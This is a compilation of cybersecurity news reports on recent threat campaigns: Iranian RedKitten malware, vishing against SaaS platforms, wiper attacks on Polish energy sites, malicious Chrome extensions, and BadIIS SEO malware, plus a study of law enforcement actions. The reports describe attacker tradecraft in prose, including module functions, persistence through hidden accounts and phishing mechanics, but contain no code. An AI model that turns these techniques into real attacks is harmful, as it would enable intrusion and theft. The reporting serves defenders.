2026-02-01 AI创业新闻
Iran-Linked RedKitten Cyber Campaign Targets Human Rights NGOs and Activists
A Farsi-speaking threat actor aligned with Iranian state interests is suspected to be behind a new campaign targeting non-governmental organizations and individuals involved in documenting recent human rights abuses. The activity , observed by HarfangLab in January 2026, has been codenamed RedKitten . It’s said to coincide with the nationwide unrest in Iran that began towards the end of 2025, protesting soaring inflation, rising food prices, and currency depreciation. The ensuing crackdown has resulted in mass casualties and an internet blackout .
“The malware relies on GitHub and Google Drive for configuration and modular payload retrieval, and uses Telegram for command-and-control,” the French cybersecurity company said. What makes the campaign noteworthy is the threat actor’s likely reliance on large language models (LLMs) to build and orchestrate the necessary tooling. The starting point of the attack is a 7-Zip archive with a Farsi filename that contains macro-laced Microsoft Excel documents. The XLSM spreadsheets claim to include details about protesters who died in Tehran between December 22, 2025, and January 20, 2026.
But embedded within each of them is a malicious VBA macro, which, when enabled, functions as a dropper for a C#-based implant (“AppVStreamingUX_Multi_User.dll”) by means of a technique called AppDomainManager injection . The VBA macro, for its part, shows signs of being generated by an LLM due to the “overall style of the VBA code, the variable names and methods” used, as well as the presence of comments like “PART 5: Report the result and schedule if successful.” The attack is likely an effort to target individuals who are looking for information about missing persons, exploiting their emotional distress to provoke a false sense of urgency and trigger the infection chain. Analysis of the spreadsheet data, such as mismatched ages and birthdates, suggests it’s fabricated. The backdoor, dubbed SloppyMIO, uses GitHub as a dead drop resolver to retrieve Google Drive URLs that host images from which its configuration is steganographically obtained, including details of the Telegram bot token, Telegram chat ID, and links staging various modules.
As many as five different modules are supported - cm, to execute commands using “cmd.exe” do, to collect files on the compromised host and create a ZIP archive for each file that fits in the Telegram API file size limits up, to write a file to “%LOCALAPPDATA%\Microsoft\CLR_v4.0_32\NativeImages\,” with the file data encoded within an image fetched via the Telegram API pr, to create a scheduled task for persistence to run an executable every two hours ra, to start a process In addition, the malware is capable of contacting a command-and-control (C2) server to beacon to the configured Telegram chat ID, receiving additional instructions and sending the results back to the operator: download, which runs the do module cmd, which runs the cm module runapp, to launch a process “The malware can fetch and cache multiple modules from remote storage, run arbitrary commands, collect and exfiltrate files and deploy further malware with persistence via scheduled tasks,” HarfangLab said. “SloppyMIO beacons status messages, polls for commands and sends exfiltrated files over to a specified operator leveraging the Telegram Bot API for command-and-control.” As for attribution, the links to Iranian actors are based on the presence of Farsi artifacts, the lure themes, and tactical similarities with prior campaigns, including that of Tortoiseshell , which has leveraged malicious Excel documents to deliver IMAPLoader using AppDomainManager injection. The attackers’ choice of GitHub as a dead drop resolver is also not without precedent. In late 2022, Secureworks (now part of Sophos) detailed a campaign undertaken by a sub-cluster of an Iranian nation-state group known as Nemesis Kitten that used GitHub as a conduit to deliver a backdoor referred to as Drokbk.
Complicating matters further is the growing adoption of artificial intelligence (AI) tools by adversaries, making it harder for defenders to distinguish one actor from the other. “The threat actor’s reliance on commoditized infrastructure (GitHub, Google Drive, and Telegram) hinders traditional infrastructure-based tracking but paradoxically exposes useful metadata and poses other operational security challenges to the threat actor,” HarfangLab said. The development comes a couple of weeks after U.K.-based Iranian activist and independent cyber espionage investigator Nariman Gharib revealed details of a phishing link (“whatsapp-meeting.duckdns[.]org”) that’s distributed via WhatsApp and captures victims’ credentials by displaying a fake WhatsApp Web login page. “The page polls the attacker’s server every second via /api/p/{victim_id}/,” Gharib explained .
“This lets the attacker serve a live QR code from their own WhatsApp Web session directly to the victim. When the target scans it with their phone, thinking they’re joining a ‘meeting,’ they’re actually authenticating the attacker’s browser session. Attacker gets full access to the victim’s WhatsApp account.” The phishing page is also designed to request browser permissions to access the device camera, microphone, and geolocation, effectively turning it into a surveillance kit that can capture victims’ photos, audio, and current whereabouts. It’s currently not known who is behind the campaign, or what was the motivation was behind it.
TechCrunch’s Zack Whittaker, who uncovered more specifics about the activity, said it’s also aimed at stealing Gmail credentials by serving a bogus Gmail login page that gathers a victim’s password and two-factor authentication (2FA) code. About 50 individuals have been found to be impacted. This includes ordinary people across the Kurdish community, academics, government officials, business leaders, and other senior figures. The findings also come in the aftermath of a major leak suffered by the Iranian hacking group Charming Kitten that laid bare its inner workings, organizational structure, and the key personnel involved.
The leaks also shed light on a surveillance platform named Kashef (aka Discoverer or Revealer ) for tracking Iranian citizens and foreign nationals by aggregating data collected by different departments associated with the Islamic Revolutionary Guard Corps (IRGC). In October 2025, Gharib also made available a database containing 1,051 individuals who enrolled in various training programs offered by Ravin Academy, a cybersecurity school founded by two operatives of Iran’s Ministry of Intelligence and Security (MOIS), Seyed Mojtaba Mostafavi and Farzin Karimi. The entity was sanctioned by the U.S. Department of the Treasury in October 2022 for supporting and enabling MOIS’s operations.
This includes assisting MOIS with information security training, threat hunting, cybersecurity, red teaming, digital forensics, malware analysis, security auditing, penetration testing, network defense, incident response, vulnerability analysis, mobile penetration testing, reverse engineering, and security research. “The model allows MOIS to outsource initial recruitment and vetting while maintaining operational control through the founders’ direct relationship with the intelligence service,” Gharib said. “This dual-purpose structure enables MOIS to develop human capital for cyber operations while maintaining a layer of separation from direct government attribution.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Mandiant Finds ShinyHunters-Style Vishing Attacks Stealing MFA to Breach SaaS Platforms
Google-owned Mandiant on Friday said it identified an “expansion in threat activity” that uses tradecraft consistent with extortion-themed attacks orchestrated by a financially motivated hacking group known as ShinyHunters. The attacks leverage advanced voice phishing (aka vishing) and bogus credential harvesting sites mimicking targeted companies to gain unauthorized access to victim environments by collecting sign-on (SSO) credentials and multi-factor authentication (MFA) codes. The end goal of the attacks is to target cloud-based software-as-a-service (SaaS) applications to siphon sensitive data and internal communications and extort victims. The tech giant’s threat intelligence team said it’s tracking the activity under multiple clusters, including UNC6661, UNC6671, and UNC6240 (aka ShinyHunters), so as to account for the possibility that these groups could be evolving their modus operandi or mimicking previously observed tactics.
“While this methodology of targeting identity providers and SaaS platforms is consistent with our prior observations of threat activity preceding ShinyHunters-branded extortion, the breadth of targeted cloud platforms continues to expand as these threat actors seek more sensitive data for extortion,” Mandiant noted. “Further, they appear to be escalating their extortion tactics with recent incidents, including harassment of victim personnel, among other tactics.” Details of the vishing and credential theft activity are as follows - UNC6661 has been observed pretending to be IT staff in calls to employees at targeted victim organizations, directing them to credential harvesting links under the guise of instructing them to update their multi-factor authentication (MFA) settings. The activity was recorded between early and mid-January 2026. The stolen credentials are then used to register their own device for MFA and then move laterally across the network to exfiltrate data from SaaS platforms.
In at least one case, the threat actor weaponized their access to compromised email accounts to send more phishing emails to contacts at cryptocurrency-focused companies. The emails were subsequently deleted to cover up the tracks. This is followed by extortion activity conducted by UNC6240. UNC6671 has also been identified as impersonating IT staff to deceive victims as part of efforts to obtain their credentials and MFA authentication codes on victim-branded credential harvesting sites since early January 2026.
In at least some instances, the threat actors gained access to Okta customer accounts. UNC6671 has also leveraged PowerShell to download sensitive data from SharePoint and OneDrive. The differences between UNC6661 and UNC6671 relate to the use of different domain registrars for registering the credential harvesting domains (NICENIC for UNC6661 and Tucows for UNC6671), as well as the fact that an extortion email sent following UNC6671 activity did not overlap with known UNC6240 indicators. This indicates that different sets of people may be involved, illustrating the amorphous nature of these cybercrime groups.
What’s more, the targeting of cryptocurrency firms suggests that the threat actors may also be looking to explore further avenues for financial gain. To counter the threat posed to SaaS platforms, Google has outlined a long list of hardening, logging, and detection recommendations - Improve help desk processes, including requiring personnel to require a live video call to verify their identity Limit access to trusted egress points and physical locations; enforce strong passwords; and remove SMS, phone call, and email as authentication methods Restrict management-plane access, audit for exposed secrets and enforce device access controls Implement logging to increase visibility into identity actions, authorizations, and SaaS export behaviors Detect MFA device enrollment and MFA life cycle changes; look for OAuth/app authorization events that suggest mailbox manipulation activity using utilities like ToogleBox Email Recall , or identity events occurring outside normal business hours “This activity is not the result of a security vulnerability in vendors’ products or infrastructure,” Google said. “Instead, it continues to highlight the effectiveness of social engineering and underscores the importance of organizations moving towards phishing-resistant MFA where possible. Methods such as FIDO2 security keys or passkeys are resistant to social engineering in ways that push-based, or SMS authentication are not.” Found this article interesting?
Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
CERT Polska Details Coordinated Cyber Attacks on 30+ Wind and Solar Farms
CERT Polska, the Polish computer emergency response team, revealed that coordinated cyber attacks targeted more than 30 wind and photovoltaic farms, a private company from the manufacturing sector, and a large combined heat and power plant (CHP) supplying heat to almost half a million customers in the country. The incident took place on December 29, 2025. The agency has attributed the attacks to a threat cluster dubbed Static Tundra , which is also tracked as Berserk Bear, Blue Kraken, Crouching Yeti, Dragonfly, Energetic Bear, Ghost Blizzard (formerly Bromine), and Havex. Static Tundra is assessed to be linked to Russia’s Federal Security Service’s (FSB) Center 16 unit.
It’s worth noting that recent reports from ESET and Dragos attributed the activity with moderate confidence to a different Russian state-sponsored hacking group known as Sandworm. “All attacks had a purely destructive objective,” CERT Polska said in a report published Friday. “Although attacks on renewable energy farms disrupted communication between these facilities and the distribution system operator, they did not affect the ongoing production of electricity. Similarly, the attack on the combined heat and power plant did not achieve the attacker’s intended effect of disrupting heat supply to end users.” The attackers are said to have gained access to the internal network of power substations associated with a renewable energy facility to carry out reconnaissance and disruptive activities, including damaging the firmware of controllers, deleting system files, or launching custom-built wiper malware codenamed DynoWiper by ESET.
In the intrusion aimed at the CHP, the adversary engaged in long-term data theft dating all the way back to March 2025 that enabled them to escalate privileges and move laterally across the network. The attackers’ attempts to detonate the wiper malware were unsuccessful, CERT Polska noted. On the other hand, the targeting of the manufacturing sector company is believed to be opportunistic, with the threat actor gaining initial access via a vulnerable Fortinet perimeter device. The attack targeting the grid connection point is also likely to have involved the exploitation of a vulnerable FortiGate appliance.
At least four different versions of DynoWiper have been discovered to date. These variants were deployed on Mikronika HMI Computers used by the energy facility and on a network share within the CHP after securing access through the SSL‑VPN portal service of a FortiGate device. “The attacker gained access to the infrastructure using multiple accounts that were statically defined in the device configuration and did not have two‑factor authentication enabled,” CERT Polska said, detailing the actor’s modus operandi targeting the CHP. “The attacker connected using Tor nodes, as well as Polish and foreign IP addresses, which were often associated with compromised infrastructure.” The wiper’s functionality is fairly straightforward - Initialization that involves seeding a pseudorandom number generator (PRNG) called Mersenne Twister Enumerate files and corrupt them using the PRNG Delete files It’s worth mentioning here that the malware does not have a persistence mechanism, a way to communicate with a command‑and‑control (C2) server, or execute shell commands.
Nor does it attempt to hide the activity from security programs. CERT Polska said the attack targeting the manufacturing sector company involved the use of a PowerShell-based wiper dubbed LazyWiper that scripts overwrites files on the system with pseudorandom 32‑byte sequences to render them unrecoverable. It’s suspected that the core wiping functionality was developed using a large language model (LLM). “The malware used in the incident involving renewable energy farms was executed directly on the HMI machine,” CERT Polska pointed out.
“In contrast, in the CHP plant (DynoWiper) and the manufacturing sector company (LazyWiper), the malware was distributed within the Active Directory domain via a PowerShell script executed on a domain controller.” The agency also described some of the code-level similarities between DynoWiper and other wipers built by Sandworm as “general” in nature and does not offer any concrete evidence as to whether the threat actor participated in the attack. “The attacker used credentials obtained from the on‑premises environment in attempts to gain access to cloud services,” CERT Polska said. “After identifying credentials for which corresponding accounts existed in the M365 service, the attacker downloaded selected data from services such as Exchange, Teams, and SharePoint.” “The attacker was particularly interested in files and email messages related to OT network modernization, SCADA systems, and technical work carried out within the organizations.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Researchers Uncover Chrome Extensions Abusing Affiliate Links and Stealing ChatGPT Access
Cybersecurity researchers have discovered malicious Google Chrome extensions that come with capabilities to hijack affiliate links, steal data, and collect OpenAI ChatGPT authentication tokens. One of the extensions in question is Amazon Ads Blocker (ID: pnpchphmplpdimbllknjoiopmfphellj), which claims to be a tool to browse Amazon without any sponsored content. It was uploaded to the Chrome Web Store by a publisher named “10Xprofit” on January 19, 2026. “The extension does block ads as advertised, but its primary function is hidden: it automatically injects the developer’s affiliate tag (10xprofit-20) into every Amazon product link and replaces existing affiliate codes from content creators,” Socket security researcher Kush Pandya said .
Further analysis has determined that Amazon Ads Blocker is part of a larger cluster of 29 browser add-ons that target several e-commerce platforms like AliExpress, Amazon, Best Buy, Shein, Shopify, and Walmart. The complete list is as follows - AliExpress Invoice Generator (FREE) - AliInvoice™️ (10+ Templates) (ID: mabbblhhnmlckjbfppkopnccllieeocp) AliExpress Price Tracker - Price History & Alerts (ID: loiofaagnefbonjdjklhacdhfkolcfgi) AliExpress Quick Currency & Price Converter (ID: mcaglpclodnaiimhicpjemhcinjfnjce) AliExpress Deals Countdown - Flash Sale Timer (ID: jmlgkeaofknfmnbpmlmadnfnfajdlehn) 10Xprofit - Amazon Seller Tools (FBA & FBM) (ID: ahlnchhkedmjbdocaamkbmhppnligmoh) Amazon Ads Blocker (ID: pnpchphmplpdimbllknjoiopmfphellj) Amazon ASIN Lookup 10xprofit (ID: ljcgnobemekghgobhlplpehijemdgcgo) Amazon Search Suggestion (ID: dnmfcojgjchpjcmjgpgonmhccibjopnb) Amazon Product Scraper 10xprofit (ID: mnacfoefejolpobogooghoclppjcgfcm) Amazon Quick Brand Search (ID: nigamacoibifjohkmepefofohfedblgg) Amazon Stock Checker 999 (ID: johobikccpnmifjjpephegmfpipfbfme) Amazon Price History Saver (ID: kppfbknppimnoociaomjcdgkebdmenkh) Amazon ASIN Copy (ID: aohfjaadlbiifnnajpobdhokecjokhab) Amazon Keyword Cloud Generator (ID: gfdbbmngalhmegpkejhidhgdpmehlmnd) Amazon Image Downloader (ID: cpcojeeblggnjjgnpiicndnahfhjdobd) Amazon Negative Review Hider (ID: hkkkipfcdagiocekjdhobgmlkhejjfoj) Amazon Listing Score Checker (ID: jaojpdijbaolkhkifpgbjnhfbmckoojh) Amazon Keyword Density Searcher (ID: ekomkpgkmieaaekmaldmaljljahehkoi) Amazon Sticky Notes (ID: hkhmodcdjhcidbcncgmnknjppphcpgmh) Amazon Result Numbering (ID: nipfdfkjnidadibpbflijepbllfkokac) Amazon Profit Calculator Lite (ID: behckapcoohededfbgjgkgefgkpodeho) Amazon Weight Converter (ID: dfnannaibdndmkienngjahldiofjbkmj) Amazon BSR Fast View (ID: nhilffccdbcjcnoopblecppbhalagpaf) Amazon Character Count & Seller Tools (ID: goikoilmhcgfidolicnbgggdpckdcoam) Amazon Global Price Checker (ID: mjcgfimemamogfmekphcfdehfkkbmldn) BestBuy Search By Image (ID: nppjmiadmakeigiagilkfffplihgjlec) SHEIN Search By Image (ID: mpgaodghdhmeljgogbeagpbhgdbfofgb) Shopify Search By Image (ID: gjlbbcimkbncedhofeknicfkhgaocohl) Walmart Search By Image (ID: mcaihdkeijgfhnlfcdehniplmaapadgb) While “Amazon Ads Blocker” offers the advertised functionality, it also embeds malicious code that scans all Amazon product URL patterns for any affiliate tag without requiring any user interaction, and replaces it with “10xprofit-20” (or “_c3pFXV63” for AliExpress). In cases where there are no tags, the attacker’s tag is appended to each URL. Socket also noted that the extension listing page on the Chrome Web Store makes misleading disclosures, claiming that the developers earn a “small commission” every time a user makes use of a coupon code to make a purchase.
Affiliate links are widely used across social media and websites. They refer to URLs containing a specific ID that enables tracking of traffic and sales to a particular marketer. When a user clicks this link to buy the product, the affiliate earns a cut of the sale. Due to the extensions searching for existing tags and replacing them, social media content creators who share Amazon product links with their own affiliate tags lose commissions when users who have installed the add-on click those links.
This amounts to a violation of Chrome Web Store policies , as they require extensions using affiliate links to accurately divulge how the program works, require user action before each injection, and never replace existing affiliate codes. “The disclosure describes a coupon/deal extension with user-triggered reveals. The actual product is an ad blocker with automatic link modification,” Pandya explained. “This mismatch between disclosure and implementation creates false consent.” “The extension also violates the Single Purpose policy by combining two unrelated functions (ad blocking and affiliate injection) that should be separate extensions.” The identified extensions have also been found to scrape product data and exfiltrate it to “app.10xprofit[.]io,” with those focusing on AliExpress serving bogus “LIMITED TIME DEAL” countdown timers on product pages to create a false sense of urgency and rush them into making purchases so as to earn commissions on affiliate links.
“Extensions that combine unrelated functionality (ad blocking, price comparison, coupon finding) with affiliate injection should be treated as high-risk, particularly those with disclosures that don’t match the actual code behavior,” Socket said. The disclosure comes as Broadcom-owned Symantec flagged four different extensions that have a combined user base exceeding 100,000 users and are designed to steal data - Good Tab (ID: glckmpfajbjppappjlnhhlofhdhlcgaj), which grants full clipboard permissions to an external domain (“api.office123456[.]com”) to enable remote clipboard-read and clipboard-write permissions Children Protection (ID: giecgobdmgdamgffeoankaipjkdjbfep), which implements functionality to harvest cookies, inject ads, and execute arbitrary JavaScript by contacting a remote server DPS Websafe (ID: bjoddpbfndnpeohkmpbjfhcppkhgobcg), which changes the default search to one under their control to capture search terms entered by users and potentially route them to malicious websites Stock Informer (ID: beifiidafjobphnbhbbgmgnndjolfcho), which is susceptible to a years-old cross-site (XSS) vulnerability in the Stockdio Historical Chart WordPress plugin ( CVE-2020-28707 , CVSS score: 6.1) that could allow a remote attacker to execute JavaScript code “While browser extensions can provide a wide range of handy tools to help us achieve more online, much care needs to be taken when choosing to install them, even when installing from trusted sources,” researchers Yuanjing Guo and Tommy Dong said . Rounding off the list of malicious extensions is another network of 16 add-ons (15 on the Chrome Web Store and one on the Microsoft Edge Add-ons marketplace) that are designed to intercept and steal ChatGPT authentication tokens by injecting a content script into chatgpt[.]com. Cumulatively, the extensions were downloaded about 900 times, according to LayerX.
The extensions are assessed to be part of a coordinated campaign due to overlaps in source code, icons, branding, and descriptions - ChatGPT folder, voice download, prompt manager, free tools – ChatGPT Mods (ID: lmiigijnefpkjcenfbinhdpafehaddag) ChatGPT voice download, TTS download – ChatGPT Mods (ID: obdobankihdfckkbfnoglefmdgmblcld) ChatGPT pin chat, bookmark – ChatGPT Mods (ID: kefnabicobeigajdngijnnjmljehknjl) ChatGPT message navigator, history scroller – ChatGPT Mods (ID: ifjimhnbnbniiiaihphlclkpfikcdkab) ChatGPT model switch, save advanced model uses – ChatGPT Mods (ID: pfgbcfaiglkcoclichlojeaklcfboieh) ChatGPT export, Markdown, JSON, images – ChatGPT Mods (ID: hljdedgemmmkdalbnmnpoimdedckdkhm) ChatGPT Timestamp Display – ChatGPT Mods (ID: afjenpabhpfodjpncbiiahbknnghabdc) ChatGPT bulk delete, Chat manager – ChatGPT Mods (ID: gbcgjnbccjojicobfimcnfjddhpphaod) ChatGPT search history, locate specific messages – ChatGPT Mods (ID: ipjgfhcjeckaibnohigmbcaonfcjepmb) ChatGPT prompt optimization – ChatGPT Mods (ID: mmjmcfaejolfbenlplfoihnobnggljij) Collapsed message – ChatGPT Mods (ID: lechagcebaneoafonkbfkljmbmaaoaec) Multi-Profile Management & Switching – ChatGPT Mods (ID: nhnfaiiobkpbenbbiblmgncgokeknnno) Search with ChatGPT – ChatGPT Mods (ID: hpcejjllhbalkcmdikecfngkepppoknd) ChatGPT Token counter – ChatGPT Mods (ID: hfdpdgblphooommgcjdnnmhpglleaafj) ChatGPT Prompt Manager, Folder, Library, Auto Send – ChatGPT Mods (ID: ioaeacncbhpmlkediaagefiegegknglc) ChatGPT Mods – Folder Voice Download & More Free Tools (ID: jhohjhmbiakpgedidneeloaoloadlbdj) With artificial intelligence (AI)-related extensions becoming increasingly common in enterprise workflows, the development highlights an emerging attack surface where threat actors weaponize the trust associated with popular AI brands to deceive users into installing them. Because such tools often require elevated execution context within the browser and have access to sensitive data, seemingly harmless extensions can become a lucrative attack vector, permitting adversaries to obtain persistent access without the need for exploiting security flaws or resorting to other methods that may trigger security alarms. “Possession of such tokens provides account-level access equivalent to that of the user, including access to conversation history and metadata,” security researcher Natalie Zargarov said . “As a result, attackers can replicate the users’ access credentials to ChatGPT and impersonate them, allowing them to access all of the user’s ChatGPT conversations, data, or code.” Browsers Become a Lucrative Attack Vector The findings also coincide with the emergence of a new malware-as-a-service toolkit called Stanley that’s being peddled on a Russian cybercrime forum for between $2,000 and $6,000, and allows crooks to generate malicious Chrome browser extensions that can be used to serve phishing pages within an HTML iframe element while still showing the legitimate URL in the address bar.
Customers of the tool gain access to a C2 panel for managing victims, configuring spoofed redirects, and sending fake browser notifications. Those who are willing to spend $6,000 get a guarantee that any extension they create using the kit will pass Google’s vetting process for the Chrome Web Store. These extensions take the form of innocuous note-taking utilities to fly under the radar. But their malicious behavior is activated when the user navigates to a website of interest to the attacker, such as a bank, at which point a full-screen iframe containing the phishing page is overlaid, while leaving the browser’s URL bar intact.
This visual deception creates a defensive blind spot that can dupe even vigilant users into entering their credentials or sensitive information on the page. As of January 27, 2026, the service appears to have vanished – likely prompted by the public disclosure – but it’s very much possible that it can resurface under a different name in the future. “Stanley provides a turnkey website-spoofing operation disguised as a Chrome extension, with its premium tier promising guaranteed publication on the Chrome Web Store,” Varonis researcher Daniel Kelley noted earlier this week. “BYOD policies, SaaS-first environments, and remote work have made the browser the new endpoint.
Attackers have noticed. Malicious browser extensions are now a primary attack vector.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
China-Linked UAT-8099 Targets IIS Servers in Asia with BadIIS SEO Malware
Cybersecurity researchers have discovered a new campaign attributed to a China-linked threat actor known as UAT-8099 that took place between late 2025 and early 2026. The activity, discovered by Cisco Talos, has targeted vulnerable Internet Information Services (IIS) servers located across Asia, but with a specific focus on targets in Thailand and Vietnam. The scale of the campaign is currently unknown. “UAT-8099 uses web shells and PowerShell to execute scripts and deploy the GotoHTTP tool, granting the threat actor remote access to vulnerable IIS servers,” security researcher Joey Chen said in a Thursday breakdown of the campaign.
UAT-8099 was first documented by the cybersecurity company in October 2025, detailing the threat actor’s exploitation of IIS servers in India, Thailand, Vietnam, Canada, and Brazil to facilitate search engine optimization (SEO) fraud. The attacks involve infecting the servers with a known malware referred to as BadIIS. The hacking group is assessed to be of Chinese origin, with the attacks dating back to April 2025. The threat cluster also shares similarities with another BadIIS campaign codenamed WEBJACK by Finnish cybersecurity vendor WithSecure in November 2025, based on overlaps in tools, command-and-control (C2) infrastructure, and victimology footprint.
The latest campaign is focused on compromising IIS servers located in India, Pakistan, Thailand, Vietnam, and Japan, although Cisco said it observed a “distinct concentration of attacks” in Thailand and Vietnam. “While the threat actor continues to rely on web shells, SoftEther VPN, and EasyTier to control compromised IIS servers, their operational strategy has evolved significantly,” Talos explained. “First, this latest campaign marks a shift in their black hat SEO tactics toward a more specific regional focus. Second, the actor increasingly leverages red team utilities and legitimate tools to evade detection and maintain long-term persistence.” The attack chain begins with UAT-8099 gaining initial access to an IIS server, typically by either exploiting a security vulnerability or weak settings in the web server’s file upload feature.
This is followed by the threat actor initiating a series of steps to deploy malicious payloads - Execute discovery and reconnaissance commands to gather system information Deploy VPN tools and establish persistence by creating a hidden user account named “admin$” Drop new tools like Sharp4RemoveLog (remove Windows event logs), CnCrypt Protect (hide malicious files), OpenArk64 (open-source anti-rootkit to terminate security product processes), and GotoHTTP (remote control of server) Deploy BadIIS malware using the newly created account With security products taking steps to flag the “admin$” account, the threat actor has added a new check to verify if the name is blocked, and if so, proceeds to create a new user account named “mysql$” to maintain access and run the BadIIS SEO fraud service without any interruption. In addition, UAT-8099 has been observed creating more hidden accounts to ensure persistence. Another notable shift revolves around the use of GotoHTTP to remotely control the infected server. The tool is launched by means of a Visual Basic Script that is downloaded by a PowerShell command that’s run following the deployment of a web shell.
The BadIIS malware deployed in the attacks is two new variants customized to target specific regions: While BadIIS IISHijack singles out victims in Vietnam, BadIIS asdSearchEngine is primarily aimed at targets in Thailand or users with Thai language preferences. The end goal of the malware still largely remains the same. It scans incoming requests to IIS servers to check if the visitor is a search engine crawler. If that’s the case, the crawler is redirected to an SEO fraud site.
However, if the request is from a regular user and the Accept-Language header in the request indicates Thai, it injects HTML containing a malicious JavaScript redirect into the response. Cisco Talos said it identified three distinct variants within the BadIIS asdSearchEngine cluster - Exclusive multiple extensions variant, which checks the file path in the request and ignores it if it contains an extension on its exclusion list that can either be resource intensive or hamper the website’s appearance Load HTML templates variant, which contains an HTML template generation system to dynamically create web content by loading templates from disk or using embedded fallbacks and replacing placeholders with random data, dates, and URL-derived content Dynamic page extension/directory index variant, which checks if a requested path corresponds to a dynamic page extension or a directory index “We assess that the threat actor, UAT-8099, implemented this feature to prioritize SEO content targeting while maintaining stealth,” Talos said of the third variant. “Since SEO poisoning relies on injecting JavaScript links into pages that search engines crawl, the malware focuses on dynamic pages (e.g., default.aspx, index.php) where these injections are most effective. Furthermore, by restricting hooks to other specific file types, the malware avoids processing incompatible static files, thereby preventing the generation of suspicious server error logs.” There are also signs that the threat actor is actively refining its Linux version of BadIIS.
An ELF binary artifact uploaded to VirusTotal in early October 2025 includes proxy, injector, and SEO fraud modes as before, while limiting the targeted search engines to only crawlers from Google, Microsoft Bing, and Yahoo! Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Badges, Bytes and Blackmail
Behind the scenes of law enforcement in cyber: what do we know about caught cybercriminals? What brought them in, where do they come from and what was their function in the crimescape? Introduction: One view on the scattered fight against cybercrime The growing sophistication and diversification of cybercrime have compelled law enforcement agencies worldwide to respond through increasingly coordinated and publicized actions. Yet, despite the visibility of these operations, there remains no comprehensive overview, to our knowledge, on how law enforcement is addressing cybercrime globally.
Publicly available information is dispersed across agencies, jurisdictions, case-specific reporting (e.g., “Operation Endgame”) [1] , and reporting formats, offering fragmented insights rather than a cohesive understanding of what types of crime are being targeted, what actions are taken, and who the offenders are. This results in isolated glimpses rather than a consistent global picture. Therefore, no publicly available summary exists that we are aware of that systematically aggregates information on law enforcement actions. To address this gap, this analysis introduces a systematically constructed dataset of 418 publicly announced law enforcement activities conducted between 2021 and mid-2025.
The data was collected by Orange Cyberdefense intelligence teams, which continuously monitor and assess cyber threats to identify emerging trends and the evolution of cyber incidents. In our dataset each entry represents a verified law enforcement action collected from official announcements and media reports, then manually enriched by the Orange Cyberdefense Security Research Center team by cross-referencing each entry to include contextual and demographic details when available. A central focus lies on the type of law enforcement action taken, such as arrests, extraditions, takedowns of illicit platforms, seizures, or sanctions. The type of illicit activity was also documented by noting which type of activity the law enforcement action addressed, e.g., Hacking, Distributed Denial of Service (DDoS) Attack, IT Worker Fraud, or Cyber Extortion, and then translated into the actual criminal act of such attacks.
Which Criminal Acts Were Addressed? This chart shows the top 10 criminal acts most frequently addressed by law enforcement in publicly reported operations. The data reveals that Extortion (including ransomware) is the most addressed criminal act, followed closely by Installation or Distribution of Malicious Software (Malware) and Unauthorized Access or Intrusion (Hacking). Together, these three categories dominate the landscape and illustrate law enforcement’s continued focus on Cyber Extortion operations and the technical intrusions that enable them.
Other prominent criminal acts, including Unauthorized Access for Espionage (Cyber Espionage), Provision of Criminal Infrastructure (Dark Web Marketplace / Sites or Infrastructure and Hosting Services), and Deceptive Acquisition of Financial Assets (Fraud), suggest that authorities are also targeting the enablers and facilitators of cybercrime. While less frequent, offenses like Data/ Information Trafficking (Selling Stolen Goods (Data), Use of Cryptocurrency to Conceal or Facilitate Crime (Cryptocurrency Misuse), and Concealment of Criminal Proceeds via ICT (Money Laundering) reflect law enforcement’s increasing attention to the financial transactions and laundering mechanisms that underpin cyber operations. Security Navigator 2026 is Here - Download Now The newly released Security Navigator 2026 offers critical insights into current digital threats, documenting 139,373 incidents and 19,053 confirmed breaches. More than just a report, it serves as a guide to navigating a safer digital landscape.
What’s Inside? 📈 In-Depth Analysis: Statistics from CyberSOC, Vulnerabilitiy scanning, Pentesting, CERT, Cy-X and Ransomware observations from Dark Net surveillance. 🔮 Future-Ready: Equip yourself with security predictions and stories from the field. 🧠 Stories from security practitioners across the world.
👁️ Security deep-dives: Get briefed on emerging trends related to Generative AI, Operational Technology and post-quantum cryptography. Stay one step ahead in cybersecurity. Your essential guide awaits! 🔗 Get Your Copy Now While financial gain remains a central driver of cyber offenses [2,3,4] , the lines between motivations have become increasingly blurred, in some cases shifting in response to geopolitical events, as we have continuously been reporting on in the past two years [5,6] .
Activities initially framed as financially motivated can quickly take on political or ideological dimensions. These fluid boundaries illustrate how financial, political, and cognitive motives increasingly coexist, challenging traditional distinctions between criminal and ideological cyber activity. What Actions Were taken by Law Enforcement? Arrests account for the largest share (29%) of law enforcement actions, illustrating law enforcement’s continued focus on individual accountability and prosecution.
Takedowns (17%) and Charges (14%) indicate a strong emphasis on disrupting operational networks and bringing offenders to justice, and together represent nearly one-third of all activity. Complementary measures such as Sentences (11%), Sanctions (7%), and Seizures (4%) show that law enforcement is addressing both criminal actors and the economic infrastructure sustaining their activities. Specifically, sanctions have shown a steady increase over recent years and reflect a growing use of non-traditional enforcement mechanisms for the inclusion of economic and diplomatic tools within the law enforcement arsenal. Actions like investigations, wanted notices, and extraditions demonstrate cross-border cooperation and the procedural depth behind each publicized enforcement effort.
Wanted notices represent a non-coercive enforcement measure focused on public identification and pursuit. They bridge the gap between investigation and arrest by facilitating cross-border coordination and sustaining pressure on suspects. Through public attribution, they also serve a deterrent function, signalling law enforcement capability and reach even when direct apprehension is not immediately possible. If we combine the data showing the type of illicit activity addressed with the type of law enforcement action, we can see that Arrests dominate across nearly all crime types, particularly Cyber Extortion (22) and Hacking (19).
Charges and Sentences are the next most frequent responses, which demonstrates that many cases progress through the judicial process. Cyber Extortion, Malware, Hacking, and Cyber Espionage attract the most diverse range of responses (including arrests, charges, sentences, and sanctions). Takedowns are strongly linked with Dark Web sites or marketplaces [7,8,9] and malware infrastructure [10,11,12] which makes sense given the operational logic behind such actions. These operations typically involve the coordinated dismantling of online infrastructure, such as servers, domains, or communication platforms that enable criminal activity.
In the case of Dark Web Marketplaces, takedowns often include seizure of servers, arrests of administrators, and replacement of website landing pages with law enforcement banners, signalling control and deterrence. Sanctions appear primarily tied to Cyber Espionage and state-aligned operations, reflecting government-level actions rather than addressing individuals. Who Are the Leading Institutions in Law Enforcement? The United States’ global leadership in cyber law enforcement is demonstrated by its listing as the primary participant in nearly half of all actions (45%).
